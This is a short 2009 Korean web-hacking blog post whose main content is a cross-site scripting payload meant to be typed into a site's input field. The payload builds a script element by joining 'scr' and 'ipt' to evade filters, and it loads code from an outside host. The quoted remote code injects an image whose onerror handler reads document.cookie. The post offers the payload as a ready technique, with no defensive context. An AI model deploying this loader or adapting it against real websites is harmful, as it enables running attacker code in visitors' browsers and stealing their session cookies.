[XSS] createElement(), getElementById(), appendChild(), innerHTML()

해킹&보안/WEB 해킹 2009/05/20 18:36
ㅇ createElement(), getElementById(), appendChild(), innerHTML() 이용,
    자바스크립트 사용 - for XSS

ㅇ 사이트 입력
<center id=xcuter></center><a onpropertychange='var x="scr"+"ipt"; var xcu=document.createElement(x); xcu.src="http://youngsam.kr/xss";document.getElementById("xcuter").appendChild(xcu);' href="xcuter"></a>

http://youngsam.kr/xss 의 내용
document.getElementById("xcuter").innerHTML = '<img src="" onerror="alert(document.cookie)"';
2009/05/20 18:36 2009/05/20 18:36
No trackbacks, 1 Comment

Trackback Address :: 이 글에는 트랙백을 보낼 수 없습니다

1 ... 1621 1622 1623 1624 1625 1626 1627 1628 1629 ... 2063